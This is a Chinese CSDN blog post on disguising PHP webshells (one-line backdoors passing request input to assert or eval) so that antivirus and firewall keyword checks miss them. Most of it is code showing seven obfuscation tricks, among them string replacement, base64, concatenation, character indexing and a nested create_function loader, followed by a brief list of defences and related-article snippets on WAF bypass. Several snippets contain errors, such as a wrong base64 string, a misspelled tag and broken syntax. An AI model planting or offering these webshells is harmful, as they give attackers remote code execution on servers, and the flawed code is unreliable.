webshell变形

最新推荐文章于 2024-02-06 00:09:01 发布
最新推荐文章于 2024-02-06 00:09:01 发布
阅读量601 收藏 1
点赞数 1
分类专栏: 网络安全 文章标签: php web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44872350/article/details/121913697
版权

web Shell变形

绕过杀毒软件的查杀

		防火墙通常以关键字判断是否为一句话木马。

变形方法:

  1. 利用str_replace函数
    在第三个参数中,查找第一个参数,并替换成第二个参数。这里就相当于删除abc。
<?php
	$a = str_replace("abc","","aabcsabcsabceabcrabct"); // $a=="assert";
	$a($_REQUEST(["cmd"]));	// assert($_REQUESTS(["cmd"]));
?>
  1. 利用base64_decode()函数
    将base64_decode()中的内同为assert的base64编码,这里的$a相当于assert。
<?php
	$a = base64_decode("YXNzZXJO");
	$a($_REQUEST(["cmd"]));
?>
  1. 利用"."操作符
    在PHP中,字符串之间连接使用的是"点"来实现的,可以把两个或两个以上的字符串连接成一个字符串,下列中的$c就相当于assert。
<?php
	$a = "as"."se";
	$b = "r"."t";
	$c = $a.$b;
	$c($_REQUEST(["cmd"]));
?>
  1. 更换数据来源
<?php
	$_REQUEST[a]($_REQUEST[cmd]); // 浏览器上拼接利用方法: a=assert&cmd=phpinfo();
?>
<?php
	@assert($_REQUEST[$_REQUEST[b]]); // 浏览器上拼接利用方法: b=cmd&cmd=phpinfo();
?>
  1. 利用<? ?>标签
<sctipt language="php">
	@assert($_REQUEST["cmd"]);	// @符号隐藏错误信息
</script>
  1. 利用字符串组合法隐藏关键字
    将需要隐藏的字符串随机打乱,首先定义一些随机字符串,在调用打乱后的字符串顺序并拼接成有效参数,下例中,$a=assert
<?php
	$str = 'abcsqebrt';
	$a = $str[0].$str[3].$str[3].$str[5].$str[7].$str[8];
	@$a($_REQUEST["cmd"]);
?>
  1. 拓展
<?php
	$__C_C="GJDZ2tYMUJQVTFSYmVGMHBPdz09";
	$__P_P="abcdefghijklmnopqrstuvwxyz";
	$__X_X="123456789";
	$__O_O=$__X_X[5].$__X_X[3]."_"; // 64_
	$__B_B=$__P_P[1].$__P_P[0].$__P_P[18].$__P_P[4]; // base
	$__H_H=$__B_B.$__O_O.$__P_P[3].$__P_P[4].$__P_P[2].$__P_P[14].$__P_P[3].$__P_P[4]; // base64_decode
	$__E_E=$__P_P[4].$__P_P[21].$__P_P[0].$__P_P[11]; // eval
	$__F_F=$__P_P[2].$__P_P[17].$__P_P[4].$__P_P[0].$__P_P[19].$__P_P[4]; // create
	$__F_F=$__F_F.'_'.$__P_P[5].$__P_P[20].$__P_P[13].$__P_P[2].$__P_P[19].$__P_P[8].$__P_P[14].$__P_P[14]/$__P_P[13]; // create_function
	$__D_D=$__F_F('$__S_S','$__E_E'."$__S_S";)); // create_function("",'eval();')
	@$__D_D($__H_H($__H_H($__C_C))); // eval('eval($_POST[x]);')
?>

总结

绕过技巧

  1. 更换执行数据源
  2. 字符替换或者编码
  3. 采取隐匿手段

WebShell的防御技巧

  1. 使用和及时更新防护类工具
  2. 对服务器的文件夹设置严格的读写权限
  3. 在服务器中禁用一些敏感的危险函数,如命令执行system()等函数
  4. 定期检查系统进程,查看是否有可疑的进程
  5. 根据文件的创建时间观察系统目录下是否有近期新建的可执行文件
White_hat007
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
php web总结,PHP WebShell变形技术总结
weixin_35948624的博客
03-11 181
简介WebShell变形技术与各种防护软件的检测方法一直都在相互对抗,本篇文章就对目前常见的WebShell变形技术进行总结。目前的防护软件对能够执行命令函数和能够执行代码的函数都会格外的敏感,如eavl、assert、system、popen、shell_exec,所以像最为简单的eval($_POST[cmd])的一句话就一定会被查杀。所以目前的变形的本质都在于如何隐藏自己的敏感函数。巧用...
Webshell&一句话木马
最新发布
2302_80585579的博客
02-06 653
eval将一个满足php代码格式的字符串当作代码执行。虚拟终端、文件管理、数据库管理、数据配置管理。creat_function()匿名函数。一、webshell介绍(网页木马)大马:体积大、隐蔽性差、功能多。一句话木马:代码简短,灵活多样。小马:体积小,隐蔽强,功能少。变形的目的:绕过防火墙的查杀。变形方法:(要会举一反三)@:不显示函数错误信息。
WebShell变形
bylfsj的博客
10-31 536
4.1.7. WebShell¶ 4.1.7.1. 常见变形¶ GLOBALS eval($GLOBALS['_POST']['op']); $_FILE eval($_FILE['name']); 拆分 assert(${"_PO"."ST"} ['sz']); 动态函数执行 $k="ass"."ert"; $k(${"_PO"."ST"} ['sz...
safe3 webshell扫描工具
04-25
虽然现在已有防火墙、杀毒、入侵检测等安全防范手段,但防火墙对Web入侵基本没有作用,杀毒软件更是对变形webshell显得无力,由此导致的网页被篡改或挂马屡见不鲜。目前专门针对Web安全的工具还很少,Safe3 WebShell...
基于深度学习与集成学习的可配置WebShell检测系统1
08-03
静态分析依赖于特征匹配,容易受到代码混淆和变形的规避;动态分析则需要执行代码,可能导致误报率高且消耗资源。此外,单一的学习模型可能无法覆盖所有类型的WebShell。 1.2 作品简介 本系统创新地融合深度学习与...
aspxwebshell_foodahp_11_vuewebshell_
10-01
7. **变形Webshell**:解析"aspx变形一句话.aspx"的含义,如何识别和防御这种难以察觉的Webshell。 8. **Vue.js项目安全**:在Vue.js项目开发中应考虑的安全措施,包括前端数据安全、API请求保护和错误处理。 通过...
php马-bypass _ alin'Blog1
08-03
在网络安全领域,Webshell是一种用于远程控制网站服务器的恶意脚本,它允许攻击者在目标服务器上执行系统命令、读取或修改数据。PHP Webshell因其语言的广泛使用而尤为常见。本文主要关注PHP Webshell的检测工具和...
安全伞 v3.2
03-12
虽然现在已有防火墙、杀毒、入侵检测等安全防范手段,但防火墙对Web入侵基本没有作用,杀毒软件更是对变形webshell显得无力,SQL注入稍微变形就可绕过传统IDS,由此导致的网页被篡改或挂马屡见不鲜。目前专门针对Web...
php——webshell变形总结
Finlinlts的博客
08-25 837
技术点 具体手法 样本
WebShell
热门推荐
高飞的博客
03-06 11万+
webshell
tomcat下jsp shellwebshell
夜行者~@
11-10 8654
首先要了解,什么是服务器,什么是web,服务器就是和电脑一样的,有操作系统,操作系统与磁盘,网卡,内存等等组合起来的就叫服务器,web内,是服务器上面的一个应用,tomcat就是一个应用,可以解析jsp文件,tomat运行之后,丢jsp进去,可以马上解析jsp文件,tomcat运行之后java sdk以及运行,jsp可以条用java sdk api,java api可以条用系统shell,这样就形...
剖析php大马,WebShell 剖析与变形
weixin_39960147的博客
03-28 789
在测试中经常说到要传马 , 这里的马就是指 WebShell . 一般马被分为小马和大马 , 按功能的强弱划分 . 最常用的 WebShell 就是一句话木马 . 这里从 PHPWebShell 入手 , 来看一下这些 WebShell 是如何执行 , 如何变形的文章内容可能比较多 , 但是耐心看完后你定会有收获最基本的WebShell结构下面是非常经典的一句话木马其实每个 WebShell 都...
webshell基础方法总结
D1stiny的博客
04-20 3万+
文章目录管理权限拿webshell(进后台)一.正常上传拿webshell:二.数据库备份拿Webshell:三.突破本地验证拿webshell五.上传其他脚本类型拿webshell六.00截断拿webshell七.利用解析漏洞拿webshelliis5.x&6.0的漏洞Apache解析漏洞iis7.0/7.5/nginx<8.03畸形解析漏洞nginx<8.03空字节代码执行...
Web】变种一句话木马--中国菜刀连接
HAPPY
07-29 8604
         【Web】变种一句话木马--中国菜刀连接 遇到这种文件: &lt;?php error_reporting(0); $_GET['POST']($_POST['GET']); ?&gt; 就是变种的一句话木马   在php网址后面加上 ?POST=assert 编辑栏密码为GET 连接即可 或者 &lt;?php $POST['POST']='assert...
php webshell探索-常见小马
qq_44370676的博客
12-11 4459
webshell一.何为webshell二.常见小马探索1.直接型2.通过反射类调用3.通过排序函数调用4.通过类的混淆1.类的魔术方法2.类的自定义方法3.通过反射获取类的注释5.通过函数的混淆6.普通的混淆7.其他的隐藏方式1.ob_start2.register_shutdown_function3.回调函数4.数组5.反引号 一.何为webshell 黑客通过一定途径将webshell上传至服务器具有执行权限(必须要有执行权限才可以,没有执行权限是没有用的)的WEB目录下。远程访问webshell
php后门拿下当前目录
aici0819的博客
03-26 369
Weevely是一个模拟类似telnet的连接的隐形PHP网页shell。它是Web应用程序后期开发的必备工具,可以作为隐形后门程序,也可以作为一个web外壳来管理合法的Web帐户,甚至可以免费托管。 weevely是一款针对PHPwebshell的自由软件,可用于模拟一个类似于telnet的连接shell,weevely通常用于web程序的漏洞利用,隐藏后门或者使用类似tel...
利用webshell流量检测实验演示各种php webshell变形方法绕WAF
07-28
对于利用webshell流量检测实验演示各种php webshell变形方法绕WAF的问题,根据引用\[1\]和引用\[2\]的内容,可以提供以下回答: Webshell是一种用于获取对服务器某种程度上的操作权限的工具,而php webshell是一种通过网站端口对网站服务器进行操作的权限。在绕过Web应用程序防火墙(WAF)的过程中,可以采用多种php webshell变形方法。 其中,管理权限拿webshell(进后台)的方法包括正常上传拿webshell、数据库备份拿webshell、突破本地验证拿webshell、上传其他脚本类型拿webshell、00截断拿webshell、利用解析漏洞拿webshell、利用编辑器拿webshell、网站配置插马拿webshell、通过编辑模板拿webshell、修改脚本直接拿webshell、数据库命令执行拿webshell、添加静态页面拿webshell、文件包含拿webshell等方法。\[2\] 而普通权限拿webshell(不进后台)的方法包括0day拿webshell、修改网站上传类型配置来拿webshell、IIS写入权限拿webshell、远程命令执行拿webshell、上传漏洞拿webshell、SQL注入拿webshell等方法。\[2\] 综上所述,利用webshell流量检测实验演示各种php webshell变形方法绕WAF的过程中,可以根据具体情况选择适合的方法来绕过WAF的检测。 #### 引用[.reference_title] - *1* [PHP常见过waf webshell以及最简单的检测方法](https://blog.csdn.net/weixin_31900373/article/details/115193111)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [拿webshell基础方法总结](https://blog.csdn.net/m0_46230316/article/details/105644775)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

White_hat007

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值